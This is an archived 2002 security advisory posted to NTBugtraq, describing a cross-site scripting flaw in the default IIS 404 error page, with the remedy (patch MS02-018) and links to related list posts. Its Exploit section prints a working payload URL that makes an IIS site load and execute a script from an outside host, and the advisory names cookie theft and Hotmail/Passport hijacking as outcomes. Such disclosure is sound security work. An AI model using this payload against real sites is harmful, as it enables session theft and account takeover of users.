IIS allows universal CrossSiteScripting

From: Thor Larholm (Thor@JUBII.DK)
Date: 04/11/02


Date:         Thu, 11 Apr 2002 00:39:10 +0200
From: Thor Larholm <Thor@JUBII.DK>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Thor Larholm security advisory TL#001
-------------------------------------

By Thor Larholm, Denmark.
10 April 2002

HTML format: http://jscript.dk/adv/TL001/

Topic: IIS allows universal CrossSiteScripting.

Discovery date: 13 March 2002.

Severity: Medium

Affected applications:
----------------------

Any IIS installation that hosts the default 404 error pages. This includes:

IIS 4
IIS 5
IIS 5.1

Impact:
-------

Stealing cookies from any IIS site, cross-domain scripting to any IIS site,
hijacking Hotmail and Passport accounts, elevating priveleges through
ActiveX components, hijacking the MSN Messenger client, etc.

Introduction:
-------------

CrossSiteScripting is a term that describes the injection of script code on
foreign sites. A very likely scenario is where a malicious programmer would
inject code on e.g. hotmail.com to steal a victims cookies, allowing him/her
to hijack the victims email account.
The default installation of IIS is suspectible to such a CSS error.

Discussion:
-----------

Every time IIS encounters a HTTP 404 errorcode, it will display a "404 not
found" page.
This HTML file uses scripting to output a link to the SERVER.TLD part of the
URL, and by crafting a specially formed URL it is possible to include
arbitrary script commands on the 404 page, thereby enabling
CrossSiteScripting on any IIS site.
If we look at 404.htm we will notice a particular line of code:

document.write( '<A HREF="' + escape(urlresult) + '">' + displayresult +
"</a>");
displayResult is derived from the first instance of :// in the URL until the
next instance of /.
This means that we will have to include our script code before the path part
of the URL. To accomplish this we include our script code in the Basic
Authentication part of the URL, but we first have to escape any special
characters in the code. Any / character will end displayresult prematurely
and any spaces will corrupt the DNS lookup, and we therefor replace any
space with a TAB (%09) and any / with %5Cx2f (\x2f, as we will dynamically
reference an external file).

Exploit:
--------

http://=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%
5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/SomeNonExistantPath
The above will include and execute
http://jscript.dk/test.js on YOUR.TLD,
provided that YOUR.TLD is served by an IIS installation.

Solution:
---------

Apply the MS02-018 patch (
http://www.microsoft.com/technet/security/bulletin/MS02-018.asp ), or delete
the default 404 errorhandler page.
You could also use the opportunity to make yourself a nice custom 404
errorhandler page.
End-users can enable the "Show friendly HTTP error messages" option in IE.

Demonstration:
--------------

I have put together some proof-of-concept examples:
- Simple: Lists your cookies in a selection of Microsoft domains.
- Advanced: get the cookies from any IIS site.
- MSN: Discloses your MSN contactlist.

These can be found at http://jscript.dk/adv/TL001/

Regards
Thor Larholm
Jubii A/S - Internet Programmer



Relevant Pages

  • IIS allows universal CrossSiteScripting
    ... Any IIS installation that hosts the default 404 error pages. ... Stealing cookies from any IIS site, cross-domain scripting to any IIS site, ... This means that we will have to include our script code before the path part ...
    (Bugtraq)
  • Re: Sharepoint 2007 and multiple headers in IIS
    ... In SPS/WSS 2003 I was able to create an IIS site and modify its ... as long as I added these headers and the appropriate dns and firewall ... I attempted the same tricks I am used to with IIS but when I add these ... Just add an additional incoming URL. ...
    (microsoft.public.sharepoint.windowsservices)
  • Routing
    ... "Default Web Site" space listening on port 80. ... different domains and I wonder whether it's possible to configure IIS to ... to another IIS site. ... Can this be achieved transparently by configuring IIS only? ...
    (microsoft.public.inetserver.iis)
  • changing url for owa
    ... whats the best way to change the URL for OWA access, ... hostname/exchange im after using something like webmail.domain.com Ive ... site under the default iis site, but this dosent quite work right, it shows ...
    (microsoft.public.exchange2000.setup.installation)
  • Re: Installing and configuring IIS/FTP for Windows XP
    ... IIS is a component only available with Windows XP Professional. ... In the Search box type: IIS, and hit enter. ... Click on "IIS Installation" and follow the instructions. ...
    (microsoft.public.windowsxp.general)